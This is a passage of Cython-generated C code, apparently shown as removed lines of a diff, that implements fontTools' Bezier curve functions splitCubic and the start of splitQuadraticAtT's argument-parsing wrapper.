__pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 583, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_splitCubic_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 583, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 583, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 583, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 583, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_t); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_t, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = PyObject_RichCompare(__pyx_int_0, __pyx_cur_scope->__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 583, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_t))) __PYX_ERR(0, 583, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_d = NULL; - PyObject *__pyx_v_solutions = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_t_11; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubic", 1); - - /* "fontTools/misc/bezierTools.py":579 - * ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15)) - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * solutions = solveCubic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 579, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 579, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 579, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 579, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - __pyx_v_d = __pyx_t_6; - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":580 - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * solutions = solveCubic( # <<<<<<<<<<<<<< - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_solveCubic); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 580, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - - /* "fontTools/misc/bezierTools.py":581 - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * solutions = solveCubic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where # <<<<<<<<<<<<<< - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - */ - __pyx_t_5 = __Pyx_PyObject_GetItem(__pyx_v_a, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_PyObject_GetItem(__pyx_v_b, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_c, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = __Pyx_PyObject_GetItem(__pyx_v_d, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PyNumber_Subtract(__pyx_t_7, __pyx_v_where); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_7)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_7, __pyx_t_5, __pyx_t_3, __pyx_t_2, __pyx_t_9}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 580, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - __pyx_v_solutions = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - */ - __pyx_t_6 = __pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(NULL, __pyx_v_solutions); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_9 = __Pyx_Generator_Next(__pyx_t_6); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_1 = ((PyObject*)__pyx_t_9); - __pyx_t_9 = 0; - __pyx_t_10 = PyList_Sort(__pyx_t_1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF_SET(__pyx_v_solutions, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":584 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) - */ - __pyx_t_11 = __Pyx_PyObject_IsTrue(__pyx_v_solutions); if (unlikely((__pyx_t_11 < 0))) __PYX_ERR(0, 584, __pyx_L1_error) - __pyx_t_12 = (!__pyx_t_11); - if (__pyx_t_12) { - - /* "fontTools/misc/bezierTools.py":585 - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] # <<<<<<<<<<<<<< - * return _splitCubicAtT(a, b, c, d, *solutions) - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 585, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_pt3)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_pt4)) __PYX_ERR(0, 585, __pyx_L1_error); - __pyx_t_9 = PyList_New(1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 585, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_9, 0, __pyx_t_1)) __PYX_ERR(0, 585, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_9; - __pyx_t_9 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":584 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) - */ - } - - /* "fontTools/misc/bezierTools.py":586 - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_splitCubicAtT); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_a)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_b)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_c)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d); - __Pyx_GIVEREF(__pyx_v_d); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_d)) __PYX_ERR(0, 586, __pyx_L1_error); - __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_v_solutions); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_6); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_t_2, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XDECREF(__pyx_v_solutions); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_30splitQuadraticAtT, "splitQuadraticAtT(pt1, pt2, pt3, *ts)\nSplit a quadratic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being three 2D tuples).\n\n Examples::\n\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (62.5, 50), (75, 37.5))\n ((75, 37.5), (87.5, 25), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_31splitQuadraticAtT = {"splitQuadraticAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_30splitQuadraticAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitQuadraticAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 3, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 589, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) 